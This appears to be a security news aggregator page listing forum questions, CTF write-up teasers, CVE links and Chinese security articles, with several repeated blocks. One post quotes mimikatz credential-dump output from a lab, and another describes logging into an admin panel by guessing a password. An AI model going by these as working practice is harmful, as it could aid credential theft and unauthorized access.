    So I was attempting to take an E01 image of a file server. But it would just get hung right away. For ftk I tried to run it as a logical volume to image it, and still it would get hung. So I used a live boot of Linux and tried to use guymaner and it would just close. It is a Raid 6 I believe. Any other recommendations on how I could take an EO1 image of the FS? Thanks submitted by /u/Pizza_Eating_Robots [link] [comments]  ( 2 min )
    CHFI certification is good at discounted price
    I have read many posts about EC Council not being good for any certification. But my question is if it's offered to me at a discounted price (99$) then it's good or still bad. Please note that this cert is being sponsored by my school, although it's not compulsory for me to join but I topped the merit list and they offered me to pay 99$ to get its voucher. So shall I go to it or simply deny it? submitted by /u/hardfire005 [link] [comments]  ( 2 min )
    Intro to Windows Registry artifacts with TryHackMe Windows Forensics Room.
    submitted by /u/DFIRScience [link] [comments]  ( 1 min )
    How do you think accuracy and precision applies to DFIR?
    I stumbled across accuracy and precision and was wondering how forensic examiners think it applies to DFIR, if at all. Maybe software, artifacts, attribution? Thoughts? https://preview.redd.it/a3xvkvnl1ud81.png?width=1024&format=png&auto=webp&s=d1ff7da688bfb06abfdaea08136cb0924c92c2fc submitted by /u/greyyit [link] [comments]  ( 3 min )
    Recovering deleted/cached images (Mac)
    I have been trying to find ways to recover deleted images from a discord server, and found that all content is stored in some form onto its cache in "~/Library/Application Support/discord/cache". The result is something like this. There seem to be some ways to recover it on windows, however, is it possible on macOS? I have no idea what I am looking at here, so forgive me for ignorance. https://preview.redd.it/brl4u4s2qtd81.png?width=1832&format=png&auto=webp&s=c87beca7931e74351107f7eea57abe24711b073c submitted by /u/Nitrote [link] [comments]  ( 1 min )
    How can I access mmssms.db without rooting phone?
    Hi, I would like to recover some deleted SMS messages. I do not know, how to access the mmssms.db, when plugging my phone to my PC without actually rooting it. What are my best options? Also how far back in time do you think I could recover the texts? submitted by /u/prois99 [link] [comments]  ( 1 min )
    Alcatel GO Flip V access?
    No idea where else to ask. There’s an Alcatel Go Flip V that I need text message logs from for a court case. I used to use BitPim for this sort of thing, but that hasn’t had profiles updated for years. I hate to phrase this in such a phone-specific way, but this phone is killing me, and I’ve tried a whole lot: Does anyone know any way to get legible texts from an Alcatel GO Flip V? Or is there anywhere else I should ask? submitted by /u/hmmqzaz [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-25 Review
    2021密码应用技术白皮书 by ourren 2021年网络检测和响应报告 by ourren 2021网络空间测绘年报 by ourren 流量全密化趋势下的检测困境和思考 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-01-25 Review
    2021密码应用技术白皮书 by ourren 2021年网络检测和响应报告 by ourren 2021网络空间测绘年报 by ourren 流量全密化趋势下的检测困境和思考 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    RESTler: Stateful REST API fuzzing tool
    Article URL: https://github.com/microsoft/restler-fuzzer Comments URL: https://news.ycombinator.com/item?id=30073154 Points: 4 # Comments: 0  ( 6 min )
  • Open

    My CRTO course and exam review
    Motivation of The Journey Continue reading on Medium »  ( 4 min )
  • Open

    ClickJackingggg!!
    Clickjacking is an interface-based attack in which a user is tricked into clicking on actionable content on a hidden website by clicking… Continue reading on Medium »  ( 2 min )
  • Open

    Weaponization of Excel Add-Ins Part 1: Malicious XLL Files and Agent Tesla Case Studies
    We observed a new surge of Agent Tesla and Dridex malware samples dropped by malicious Excel add-ins (XLL files). We focus here on Agent Tesla. The post Weaponization of Excel Add-Ins Part 1: Malicious XLL Files and Agent Tesla Case Studies appeared first on Unit42.
  • Open

    Hack into Skynet —  Real World CTF (2022) walkthrough
    In this writeup, I’m sharing one of the potential methods to pwn a web challenge on Real world CTF 2022. All challenges built on top of real-world applications & due to the impact of COVID-19, The…  ( 5 min )
    Attacks on JSON Web Token (JWT)
    In part1 of the article, I introduced JSON web tokens that what is JWT and How they are made? I prefer to take a look at that before you go…  ( 8 min )
    How I ended up downloading a malware
    Hello folks!!! My brother and I were bored this weekend and decided to play a game, so he downloaded the game. Here’s the fascinating part…  ( 4 min )
    How I passed CEH (Practical) in my first attempt by Guru HariHaraun
    Hello guys! I’m Guru HariHaraun, 21 years old. In this blog, I will be sharing with you my secret strategy I followed to pass CEH…  ( 7 min )
    How I was able to find multiple vulnerabilities of a Symfony Web Framework web application
    Found high severity vulnerability in 5 minutes just from reconnaissance. Found multiple vulnerabilities on a web application that used the…  ( 3 min )
    Hacking Microsoft Forms
    Since the growth of Online learning during this pandemic — students, researchers have been on an hunt for hacks on Microsoft Forms which…  ( 2 min )
    Day 16, Web Reconnaissance Or Information Gathering — Part 1#100DaysofHacking
    Get all the writeups from Day 1 to 15, Click Here Or Click Here.  ( 5 min )
    How I Discovered Thousands of Open Databases on AWS
    My journey on finding and reporting databases with sensitive data about Fortune-500 companies, Hospitals, Crypto platforms, Startups during…  ( 9 min )
    Simple CTF- TryHackme
    CTF  ( 3 min )
    LAB Setup — ModSecurity || Apache as reverse Proxy || Generate& Install self signed SSL…
    A: Configure Apache as reverse proxy and the application [demo.testfire.net] should be accessible via local host entry through configured…  ( 7 min )
  • Open

    Hack into Skynet —  Real World CTF (2022) walkthrough
    In this writeup, I’m sharing one of the potential methods to pwn a web challenge on Real world CTF 2022. All challenges built on top of real-world applications & due to the impact of COVID-19, The…  ( 5 min )
    Attacks on JSON Web Token (JWT)
    In part1 of the article, I introduced JSON web tokens that what is JWT and How they are made? I prefer to take a look at that before you go…  ( 8 min )
    How I ended up downloading a malware
    Hello folks!!! My brother and I were bored this weekend and decided to play a game, so he downloaded the game. Here’s the fascinating part…  ( 4 min )
    How I passed CEH (Practical) in my first attempt by Guru HariHaraun
    Hello guys! I’m Guru HariHaraun, 21 years old. In this blog, I will be sharing with you my secret strategy I followed to pass CEH…  ( 7 min )
    How I was able to find multiple vulnerabilities of a Symfony Web Framework web application
    Found high severity vulnerability in 5 minutes just from reconnaissance. Found multiple vulnerabilities on a web application that used the…  ( 3 min )
    Hacking Microsoft Forms
    Since the growth of Online learning during this pandemic — students, researchers have been on an hunt for hacks on Microsoft Forms which…  ( 2 min )
    Day 16, Web Reconnaissance Or Information Gathering — Part 1#100DaysofHacking
    Get all the writeups from Day 1 to 15, Click Here Or Click Here.  ( 5 min )
    How I Discovered Thousands of Open Databases on AWS
    My journey on finding and reporting databases with sensitive data about Fortune-500 companies, Hospitals, Crypto platforms, Startups during…  ( 9 min )
    Simple CTF- TryHackme
    CTF  ( 3 min )
    LAB Setup — ModSecurity || Apache as reverse Proxy || Generate& Install self signed SSL…
    A: Configure Apache as reverse proxy and the application [demo.testfire.net] should be accessible via local host entry through configured…  ( 8 min )
  • Open

    Hack into Skynet —  Real World CTF (2022) walkthrough
    In this writeup, I’m sharing one of the potential methods to pwn a web challenge on Real world CTF 2022. All challenges built on top of real-world applications & due to the impact of COVID-19, The…  ( 5 min )
    Attacks on JSON Web Token (JWT)
    In part1 of the article, I introduced JSON web tokens that what is JWT and How they are made? I prefer to take a look at that before you go…  ( 8 min )
    How I ended up downloading a malware
    Hello folks!!! My brother and I were bored this weekend and decided to play a game, so he downloaded the game. Here’s the fascinating part…  ( 4 min )
    How I passed CEH (Practical) in my first attempt by Guru HariHaraun
    Hello guys! I’m Guru HariHaraun, 21 years old. In this blog, I will be sharing with you my secret strategy I followed to pass CEH…  ( 7 min )
    How I was able to find multiple vulnerabilities of a Symfony Web Framework web application
    Found high severity vulnerability in 5 minutes just from reconnaissance. Found multiple vulnerabilities on a web application that used the…  ( 3 min )
    Hacking Microsoft Forms
    Since the growth of Online learning during this pandemic — students, researchers have been on an hunt for hacks on Microsoft Forms which…  ( 2 min )
    Day 16, Web Reconnaissance Or Information Gathering — Part 1#100DaysofHacking
    Get all the writeups from Day 1 to 15, Click Here Or Click Here.  ( 5 min )
    How I Discovered Thousands of Open Databases on AWS
    My journey on finding and reporting databases with sensitive data about Fortune-500 companies, Hospitals, Crypto platforms, Startups during…  ( 9 min )
    Simple CTF- TryHackme
    CTF  ( 3 min )
    LAB Setup — ModSecurity || Apache as reverse Proxy || Generate& Install self signed SSL…
    A: Configure Apache as reverse proxy and the application [demo.testfire.net] should be accessible via local host entry through configured…  ( 8 min )
  • Open

    RWCTF 4th Desperate Cat Writeup
    在 Real World CTF 4th 中,我很荣幸再次作为出题人参与出题。我出了一道名叫 Desperate Cat 的题目,考察的是在严苛条件下 Tomcat Web 目录写文件 getshell 的利用。  ( 2 min )
    FreeBuf早报 | 去年全球共记录1862起数据泄漏事件;俄罗斯当局逮捕一国际网络犯罪组织的头目
    澳大利亚证券和投资委员会(ASIC)宣布,它正在与五家监管科技公司合作创建一个新的平台,旨在更好处理上市公司的信息。  ( 1 min )
    攻击技术研判|利用安全模式突破安全产品防线
    近期sophos的研究人员发现了名为AvosLocker的新勒索软件团伙。攻击者利用安全产品无法运行于安全模式下的防护缺失规避检测,并利用例外配置保持对目标的远程控制能力。  ( 1 min )
    modsecurity 搭建web安全防火墙和流量检测
    ModSecurity是一个开源的跨平台Web应用程序防火墙(WAF)引擎,用于Apache,IIS和Nginx,由Trustwave的SpiderLabs开发。  ( 2 min )
    在 AD FS 中获取你的万能令牌
    微软的 AD FS(联合身份验证) 服务是一种跨边界的身份识别认证服务,旨在让 AD 域外的服务使用 AD 域账户进行认证,可以在多个不同实体或组织之间实现 SSO(单点登录)。  ( 1 min )
    内网代理工具与检测方法研究
    隧道技术是一种通过使用互联网络的基础设施在网络之间传递数据的方式。使用隧道传递的数据(或负载)可以是不同协议的数据帧或包。  ( 1 min )

  • Open

    What are Sock Puppets And How To Create One?
    Sock puppets are constantly engaging in different ways across social media trying to influence what we think and what we believe. So how to Continue reading on Medium »  ( 3 min )
    Analyser une requête Twitter en 5 minutes
    Dans le cadre d’une analyse de la communication d’un concurrent ou de la recherche d’informations sur les réseaux sociaux, il peut être… Continue reading on Medium »  ( 2 min )
    Bundesservice Telekommunikation — enttarnt: Dieser Geheimdienst steckt dahinter
    Nach einer Tarnbehörde suchen und drei finden. Mit welchen einfachen Tricks deutsche Geheimdienste entlarvt werden können. Continue reading on Medium »  ( 12 min )
    CyberSoc | Cyber Detective CTF Write Up — Life Online
    OSINT-focused CTF Challenges. OSINT in Twitter, Stego, Crypto and more Continue reading on Medium »  ( 3 min )
    OSINT Tools to Use
    OSINT tools: An expanding list Continue reading on Medium »  ( 14 min )
  • Open

    CVE-2022-0185 in Linux Kernel Can Allow Container Escape in Kubernetes
    Article URL: https://blog.aquasec.com/cve-2022-0185-linux-kernel-container-escape-in-kubernetes Comments URL: https://news.ycombinator.com/item?id=30064884 Points: 2 # Comments: 0  ( 4 min )
    CVE-2021-3998 and CVE-2021-3999 in glibc's realpath() and getcwd()
    Article URL: https://www.openwall.com/lists/oss-security/2022/01/24/4 Comments URL: https://news.ycombinator.com/item?id=30057900 Points: 2 # Comments: 0  ( 5 min )
    CVE-2021-3996 and CVE-2021-3995 in util-Linux's libmount
    Article URL: https://www.openwall.com/lists/oss-security/2022/01/24/2 Comments URL: https://news.ycombinator.com/item?id=30056823 Points: 3 # Comments: 0  ( 3 min )
  • Open

    Cobalt Strike, a Defender’s Guide - Part 2
    submitted by /u/dmchell [link] [comments]
  • Open

    Using Twitter to notify careless developers — the unorthodox way (Or, how you could use GitHub to compromise 9.5K Twitter accounts without “hacking”)
    submitted by /u/sp00kyphiss [link] [comments]  ( 1 min )
    Paranoids’ Vulnerability Research: PrinterLogic Issues Security Alert
    submitted by /u/jrozner [link] [comments]
    WordPress 5.8.2 Stored XSS Vulnerability
    submitted by /u/monoimpact [link] [comments]
    Cobalt Strike, a Defender’s Guide – Part 2
    submitted by /u/TheDFIRReport [link] [comments]
    How BRATA is monitoring your bank account | Cleafy Labs
    submitted by /u/f3d_0x0 [link] [comments]
    TypeScript scenario-based web application Fuzzing Framework, supports genetic algorithm and running on CI
    submitted by /u/hi120ki [link] [comments]
    Private Network Access: introducing preflights - Chrome Developers
    submitted by /u/rhaidiz [link] [comments]
    Qiling Sandbox Escape
    submitted by /u/ly4k_ [link] [comments]
    CVE-2022-0185 – What does the newest kernel exploit mean for Kubernetes
    submitted by /u/gemyougym [link] [comments]  ( 1 min )
  • Open

    HOW I hacked thousand of subdomains
    Hello everyone Continue reading on Medium »  ( 3 min )
    Hack into Skynet —  Real World CTF (2022) walkthrough
    Continue reading on InfoSec Write-ups »  ( 4 min )
    Journey for finding the CSRF Bug lead to the finding of the 403 Forbidden error
    Hello myself Manan Aggarwal and this is my First Blog Post that while I was finding the CSRF Bug that Lead to the finding of the 403… Continue reading on Medium »  ( 2 min )
    Registrations Open for IWCON 2022 — the Online Infosec Conference & Networking Event
    Listen to 15+ awesome speakers and meet some of the coolest peeps in Infosec! Continue reading on InfoSec Write-ups »  ( 2 min )
    deBridge launches bug bounty on ImmuneFi
    This initiative is being funded by deBridge in order to improve network security and reliability for the network’s global community. Continue reading on Medium »  ( 2 min )
    Security Explained: Penetration Testing vs Bug Bounties
    In the world of application and network cybersecurity, you may have asked the question: what is penetration testing? Or what are bug… Continue reading on Medium »  ( 3 min )
  • Open

    Why are serializing bugs not a thing? Does code execution only occur during deserializing data only?
    Noticed all the fanfare around deserializing but not the opposite which is serializing a string and getting code execution from that. submitted by /u/Academic-Discount252 [link] [comments]  ( 2 min )
    Is authenticating by URL secure?
    The idea is to have a desktop .NET app that authenticates a user by having a built in browser that takes you to an SSO page, and only allows access to the app if you successfully arrive at a URL which is only accessible if you were able to successfully log in. Is this a secure method? I’m worried if there is some way of faking a URL. Is there some other alternative similar to this that is more secure, maybe something to do with certificates? I’m very new to this kinda of stuff so any help is appreciated. submitted by /u/Sloathe [link] [comments]  ( 1 min )
    Looking to make a VLAN on my Home Network to protect a New Machine
    Two of my devices have had strange occurrences over the last couple of months. I am sure its fine but it has been enough to where I don’t trust them. I Have been building a desktop and I am about to finish. My question is how to best keep my new desktop with a fresh install of Windows 10 safe from any possible malware lingering on my other two machines on the network. Would a VLAN be the way to go on something like this? Like set up a VLAN specifically for my desktop. I am new at this stuff so I apologize in advance for any annoying assumptions or questions. Thank you so much for your consideration. EDIT: I also have an unmanaged switch and a Netgear wifi extender/access point at my disposal. My ISP is Xfinity. EDIT: VLAN needs a managed switch so its a no go. submitted by /u/Zpointe [link] [comments]  ( 1 min )
    Could other logging systems have similar flaws to log4shell if fuzzed properly?
    The problem with log4shell is it was overblown and very buzz wordy when it relied on a known flaw from years ago called jdni injection but im thinking bigger then jdni and java. Could other programming languages like php python ruby aspx/net framework have similar flaws to force their logging system to execute a log as code? Most logging systems don’t have fancy features like jdni ldap etc so im not sure what you could leverage to force code to be executed. submitted by /u/Academic-Discount252 [link] [comments]  ( 1 min )
    How do I get out?
    Hi all, bit of an usual one for you - I really want out of cybersecurity. I've got about 3 years of experience in netsec, mostly doing app and infrastructure security testing and honestly I hate it. Every project is a brand new technology I've got little experience in and I always end up feeling like I couldn't possibly have tested it 100% properly. I have major anxiety and panic issues and I'm finding the entire thing just too stessful and have completely burnt out in a few short years. So my question is: Has anyone successfully transitioned into another IT space from cyber security? I would love to just be a sysadmin and only have a single network and set of technologies to contend with, so I can feel like i'll truly master them and become properly proficient. The problem is I think I'll have a lot of stigma going into interviews as it will be very obvious I couldn't handle netsec and am looking for an out, especially considering as I'm on £50k and will likely need to take a cut down to 25k-35k to get into a role like this. So any advice anyone can offer for how to approach this situation? Do I need to go get an entirely different set of certs before I'll even be considered? signed, a very burnt out pentester submitted by /u/mekkr_ [link] [comments]  ( 8 min )
    Interview technical test
    Hey guys, I'm interviewing for a jr pen tester position and was asked for a technical test that consists in checking the security of an IP target that is hosted in the AWS cloud. I can use whatever tool I want as long as I find issues in the IP target and recommend ways to solve the issue. I have three days to do this test, and I'm looking to learn whatever I have to learn to take this next step that will change my life forever, but I have no idea how to start. Can you guys point me in the right direction? What resources do I have to start learning that? Thank you, and sorry if this doesn't fall in the scope of the subreddit. submitted by /u/Kelvien [link] [comments]  ( 2 min )
    A HUGE untapped attack surface for auth bypassing: Arbitrary Server Side Forwards also known as Unvalidated Forwards or Dangerous Forwards. Its basically SSRF-Lite.
    Barely any blogs or posts cover this stuff indepth enough for my liking and some of the biggest auth bypasses in java apps stem from their requestdispatch forward feature which allows you to access internal authenticated apis and endpoints as a non logged in session. What im wondering is if theres anything anagalous like this in other popular languages like php ruby on rails django etc to do the same thing and if not is there any research regarding auth bypasses for open redirects which are more client side based and I don’t believe they can be used for auth bypasses since forwards are internal/server sided and keep session and parameter data intact where as redirects are client sided and initialize fresh session data so they seem less useful then forwards. The only time ive seen an open redirect possibly bypass authentication is in combination with a ssrf or some feature where the web app follows the url and then follows that urls redirect internally. Would love fellow netsecs peeps insight on this under researched phenomenon. submitted by /u/Academic-Discount252 [link] [comments]  ( 1 min )
    Interview Question
    Hi guys, I have an interview for Intern SOC analyst in one of the reputed organization and the interview will consist some technical lab as well, any idea what can the lab questions?? How can I prepare for the lab examination. submitted by /u/Either_Attempt_9108 [link] [comments]  ( 2 min )
  • Open

    Registrations Open for IWCON 2022 — the Online Infosec Conference & Networking Event
    Listen to 15+ awesome speakers and meet some of the coolest peeps in Infosec!  ( 2 min )
  • Open

    Registrations Open for IWCON 2022 — the Online Infosec Conference & Networking Event
    Listen to 15+ awesome speakers and meet some of the coolest peeps in Infosec!  ( 2 min )
  • Open

    Registrations Open for IWCON 2022 — the Online Infosec Conference & Networking Event
    Listen to 15+ awesome speakers and meet some of the coolest peeps in Infosec!  ( 2 min )
  • Open

    Movies and series
    submitted by /u/omnifage [link] [comments]
    Dataset and model of the universe
    Gaia is a European space mission providing astrometry, photometry, and spectroscopy of more than 1000 million stars in the Milky Way. Also data for significant samples of extragalactic and Solar system objects is made available. The Gaia Archive contains deduced positions, parallaxes, proper motions, radial velocities, and brightnesses. Complementary information on multiplicity, photometric variability, and astrophysical parameters is provided for a large fraction of sources. http://cdn.gea.esac.esa.int/ Browse to https://gea.esac.esa.int/ for info. submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
  • Open

    Paranoids’ Vulnerability Research: PrinterLogic Issues Security Alert
    Article URL: https://www.yahooinc.com/paranoids/paranoids-vulnerability-research-printerlogic-issues-security-alert/ Comments URL: https://news.ycombinator.com/item?id=30060422 Points: 2 # Comments: 0  ( 8 min )
    F5 fixes high-risk Nginx Controller vulnerability in January patch rollout
    Article URL: https://portswigger.net/daily-swig/f5-fixes-high-risk-nginx-controller-vulnerability-in-january-patch-rollout Comments URL: https://news.ycombinator.com/item?id=30060420 Points: 2 # Comments: 0  ( 3 min )
  • Open

    SecWiki News 2022-01-24 Review
    初探node.js相关之原型链污染 by ourren 2021攻击技术发展趋势报告 by ourren SecWiki周刊(第412期) by ourren 内网代理工具与检测方法研究 by xiahao90 狩猎样本的哈希游戏 by Avenger 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-01-24 Review
    初探node.js相关之原型链污染 by ourren 2021攻击技术发展趋势报告 by ourren SecWiki周刊(第412期) by ourren 内网代理工具与检测方法研究 by xiahao90 狩猎样本的哈希游戏 by Avenger 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Exfiltration
    I'd like to start a brief discussion that might be a great learning opportunity for a lot of newbie forensic investigators - From a forensics standpoint, how would you tell if a file was exfiltrated? For this scenario, I'm thinking ransomware gang exfiltrates data before encrypting and is using a cloud based solution for storage. submitted by /u/DeadBirdRugby [link] [comments]  ( 3 min )
    Does anyone have experience with /media/0/.RecycleBin? (Android)
    If a file has a creation time and has this location, does this mean the creation time is the time the file was put there? And therefore "deleted"? submitted by /u/DHZX [link] [comments]  ( 1 min )
    Cobalt Strike, a Defender’s Guide – Part 2
    submitted by /u/TheDFIRReport [link] [comments]  ( 1 min )
  • Open

    安全分析技术的“前世今生”
    过去十年中,安全分析这项技术发生了怎样的变化?本文将和大家一起探讨安全分析的演变和价值。  ( 1 min )
    数千工业组织的企业电子邮件账户失窃,被滥用进行下一次攻击
    攻击者滥用企业邮箱的联系人信任发起攻击,从一个工业企业传播到另一个工业企业。  ( 1 min )
    在公司里他们只想低调,但是实力不允许
    斗象科技首届内部攻防演练圆满结束。
    斗象科技荣膺2021年网络安全优秀企业“安全服务十强”
    成功入选并荣获“安全服务十强”称号
    《2021年全国移动应用安全观测报告》
    当前,我国网络安全形势依然严峻,在大数据时代下,网络安全存在着病毒威胁、网络诈骗、黑客入侵、信息丢失等各种安全隐患。  ( 1 min )
    《2021业务风控洞察报告》正式发布
    从业务安全、内容安全、跨境安全三个维度对2021年典型欺诈场景和案例进行了深入剖析。
    FreeBuf早报 | 俄罗斯央行建议禁止加密货币;黑客将恶意程序植入到 UEFI 固件中
    一项新调查显示,过去三年中,针对世界各地公司的网络攻击数量增加了 15%。  ( 1 min )
    从重大漏洞应急看云原生架构下的安全建设与安全运营(上)
    重大漏洞的应急响应总结与安全运营驱动的安全能力建设  ( 1 min )
    浅谈PHP伪协议
    php中有很多封装协议,最常见的如file协议,php协议,data协议,zip和phar协议等等。  ( 1 min )
  • Open

    Forge HackTheBox Walkthrough
    Introduction Forge is a CTF Linux box rated “medium” on the difficulty scale on the HackTheBox platform. The box covers subdomain enumeration, SSRF attacks and The post Forge HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Forge HackTheBox Walkthrough
    Introduction Forge is a CTF Linux box rated “medium” on the difficulty scale on the HackTheBox platform. The box covers subdomain enumeration, SSRF attacks and The post Forge HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    CVE-2021-33742:Internet Explorer MSHTML 堆越界写漏洞分析
    作者:天融信阿尔法实验室 原文链接:https://mp.weixin.qq.com/s/nfPm0B2Z9dTodsw-VTUxpQ 1 漏洞背景 2021年07月14日Google威胁分析团队(TAG:Threat Analysis Group)发布了一篇标题为"How We Protect Users From 0-Day Attacks"的文章。这篇文章公布了2021年Google威...
  • Open

    CVE-2021-33742:Internet Explorer MSHTML 堆越界写漏洞分析
    作者:天融信阿尔法实验室 原文链接:https://mp.weixin.qq.com/s/nfPm0B2Z9dTodsw-VTUxpQ 1 漏洞背景 2021年07月14日Google威胁分析团队(TAG:Threat Analysis Group)发布了一篇标题为"How We Protect Users From 0-Day Attacks"的文章。这篇文章公布了2021年Google威...
  • Open

    No length on password
    Imgur disclosed a bug submitted by blackfly_: https://hackerone.com/reports/1411363 - Bounty: $250
  • Open

    CVE-2021-33742:Internet Explorer MSHTML堆越界写漏洞分析
    1、漏洞背景 2、漏洞简介 3、分析环境 3.1、提取漏洞模块 3.2、关闭ASLR 4、漏洞复现 5、Internet Explorer DOM树的结构 5.1、以文本为中心的设计 5.2、增加复杂性层次结构 5.3、原来的DOM没有经过封装 6、漏洞原理分析 6.1、逆向mshtml.dll中此漏洞的相关类 6.1.1、CSpliceTreeEngine 6.1.2、CTreeNode 6.1.3、CTreePos 6.1.4、CTreeDataPos 6.1.4.1、Tree::TextData 6.1.4.2、CTxtPtr 6.2、漏洞PoC所对应的DOM树 6.3、漏洞产生的根本原因分析 7、漏洞修复 8、参考链接 漏洞背景 2021年07月14日Google威胁分析团队(TAG:Threat Analysis Group)发布了一篇标题为"How We Protect Users From 0-Day Attacks"的文章。这篇文章公布了2021年Google威胁分析团队发现的4个在野利用的0day漏洞的详细信息。Google Chrome中的CVE-2021-21166和CVE-2021-30551,Internet Explorer中的CVE-2021-33742和Apple Safari中的CVE-2021-1879。 2021年4月,TAG发现了一项针对亚美尼亚用户的攻击活动,该活动通过恶意的Office文档调用Internet Explorer加载远程的恶意Web页面来利用Internet Explorer渲染引擎中…

  • Open

    mimikatz LogonPasswords and usernames with dollar sign ($) at the end
    I have a lab that I'm testing mimikatz on. Some of the usernames are dumped as "hostname$" What does that mean? hostname being the actual host name of the test server being in this case "labserver"; so it will be something like: [...] kerberos : * Username : labserver$ * Domain : lab.corp * Password : P@ssW0rd!! submitted by /u/ak_z [link] [comments]  ( 1 min )
    [Malware] I've started studying malware and more specifically backdoors, but something seems to not make any sense.
    Hey, i've recently started to study how backdoors work and are used / made. But i've noticed that every backdoor i've come accross follows this principle : A client runs on the target and tries to connect to the attacker to give him access. The server runs on the attacker and waits for a connection from the target. Shouldn't this be the opposite so the attacker can gain access whenever he wants ? Isn't the purpose of a backdoor to be an easy for the attacker to come back later? If so doesn't it defeat it ? Am i misunderstanding something ? I hope someone can help me clarify this. PS : I'm not asking this to commit any sort of crime, i'm genuinely interested in cybersecurity research and thats why i'm asking this question. submitted by /u/fleurdelys- [link] [comments]  ( 2 min )
    Which do you think is the higher tier in cyber security?
    Soc analyst or security analyst? submitted by /u/lowkiwatchingyou [link] [comments]  ( 1 min )
    Weak password found on "accident"
    Backstory for question: I'm currently on the process of getting a job and I was sent a link (via email) to a psychological test which required a username and password to login, the user was already typed for me (sent as parameter on the url) and the password was sent on the email. At first I didn't read the full email so I entered the link and when I saw I needed a password, I thought that there must've been a mistake, so I typed a "random" password to see what would happen (I typed the same user as the pass) and I was able to log in. I was very confused as I was greeted with a page full of information regarding the account I was logged in to and as I explored further I was able to see personal information regarding other people that have done the quiz. At this point I realized that I wasn't supposed to be able to read this info so I logged out and tried another password (I was thinking that maybe the account accepted everything you typed) but no, I got a "wrong password" text. I read the email again, this time I saw that the password I was supposed to use was always there, I try it and I log in succesfully, but now it doesn't redirect me to the admin panel, it takes me to the psych test I'm supposed to be doing. As a NetSec Student, I know that I should let the company know about this weak password, but I don't know how to do it without it looking like I was on purpose trying to log in with another password different than the one provided via email and maybe get in trouble with the company I'm applying to. Worded as a question: What is the best way to let a company know that they have a vulnerability on an account? TL;DR: Got sent user and pass for an account, tried same user as pass instead (because I'm dumb and didn't read full email) and logged in as admin. Want to disclose this to the company but don't want to get in trouble. submitted by /u/Emacholo [link] [comments]  ( 3 min )
    Advice on a DAST Tool to Handle Single Page Apps
    Hi everyone, I’m currently looking for a DAST scanner that works well with single page applications (I’m using Ember.js with a couple of APIs behind it). For example, every tool I’ve tried has not been able to effectively test for XSS, as they can’t link injection points from API calls back to the rendered DOM on the monolithic front end. Any tools, advice, etc. would be so greatly appreciated. Also, please note that I already utilize SCA and SAST, and will be moving to IAST in the future – this is solely about DAST. Cost is not a concern, just effectiveness. submitted by /u/shadowcorp [link] [comments]  ( 1 min )
    Jumping from Application Developer/DevOps to Application Security Engineer
    Hey everyone, I'm 27, relatively new into tech (4 yesrs of experience). I'm a full stack developer, experienced with DevOps and CI/CD pipelines, and I have a CISSP. My goal is to ultimately become a jack of all trades architect. I'm potentially getting an opportunity to move into an application security engineering role that has significantly less development, and a lot more threst modeling, security architecture, pen testing, etc. I've never done those things, I've only studied them. Is it worth it to switch into a much more high level security oriented position? Would I be abandoning my primary skill set? Or is there a way to combine the 2 down the line? I'd love to hear your experience, your advice, and how your own career grew. submitted by /u/pyscho94 [link] [comments]  ( 1 min )
    Strange unknown local device found when running Wireshark and filtering via ARP
    Hi, I apologize in advance if this does not fit this subreddit. I was running wireshark on my home network and was filtering by ARP to test some things. But in the process I found a strange device with a Facebook mac adress. https://imgur.com/a/HbNuWdE (note, I removed the mac for the router) It was only the router asking for ip and not vice verca. Why would the router ask for it in the first place? Any info/explination would be appreciated. submitted by /u/Wattcat [link] [comments]  ( 1 min )
    Career pivot!
    Looking to pivot the the cyber security world. Studying for a sec + cert, have a secret clearance, and got a cyber cert from MIT. Have 2 years of DOD consulting experience. And an engineering degree. Looking at roles like “cybersecurity engineer” and cybersecurity analyst What kind of compensation can I expect as a government contractor with the above resume? I’m looking to get into the RMF/Policy/Vulnerability Assessment world. I am trying to create a future path for myself down the road. submitted by /u/tbrady1001 [link] [comments]  ( 1 min )
    Making the jump from IT Support to Security - Advice needed
    Hello, Looking to move into IT Security from IT Support. I currently have 15+ years in IT Support (1st, 2nd, 3rd line IT support). Unfortunately I'm pretty clueless on progression steps and the certs needed to climb up the Security ladder. I don't like the idea of CISSP as that appears to be geared towards management, but like the look of Security Analysis/Defensive/Offensive. With my IT background what certs should I look at? I was thinking GCIH as a start? Also would 2 years as a Security Analyst with a couple of certs be enough to progress in a new company? Or would 5 years (for example) be the minimum I would realistically need? Any advice/insight would be appreciated and apologies if this is the wrong forum. submitted by /u/ZoidbergsMinions [link] [comments]  ( 5 min )
    Security for Personal IT Tutor
    Hi, I’m getting increasing requests from friends of friends of family to do some basic IT support work for them. With close family members I have been entrusted with access to their password managers and unattended remote access, which is really useful to be able to help with things they can’t do themselves or when they’re away from their devices - all the credentials for this are kept in a totally separate password manager from my personal accounts. However I recognise that this is big security risk, and if I’m going to be working with people outside my family, I want to avoid exposing them to unnecessary risk without severely limiting my ability to help them. What should I be conscious of in setting up a remote access solution for this purpose? Are there any good ways that clients can share passwords or access to specific accounts without me having access to their entire password manager? submitted by /u/marquitanavin [link] [comments]  ( 1 min )
    Temporal Scoring - CVSS How to Input
    So right now I am using CVSS v3.0 base scoring to calculate severity of a findings from scanning tools like Tenable.sc, snyk, and some other tools. I want to go farther and factor the CVSS Temporal score into the severity so I can prioritize better... question is how do I do that when I have 1,000+ findings and can't do it manually? Where can I get a feed or service or point in time data to get that? NVD does not provide it. ​ Thank you! submitted by /u/ThrowThrowAway789 [link] [comments]  ( 1 min )
  • Open

    A new shellcode injection methodology
    submitted by /u/Idov31 [link] [comments]
    Binary-only fuzzong with python, Qemu and LibAFL
    submitted by /u/domenukk [link] [comments]
    Doing a uni project on pen testing and appreciated this article for help writing up an information disclosure vulnerability. Though some of you might appreciate it too.
    submitted by /u/PlatonicDogLover93 [link] [comments]  ( 1 min )
    Backdoor Found in Themes and Plugins from AccessPress Themes (CVE-2021-24867)
    submitted by /u/ScottContini [link] [comments]
  • Open

    The Threat Landscape and Attribution
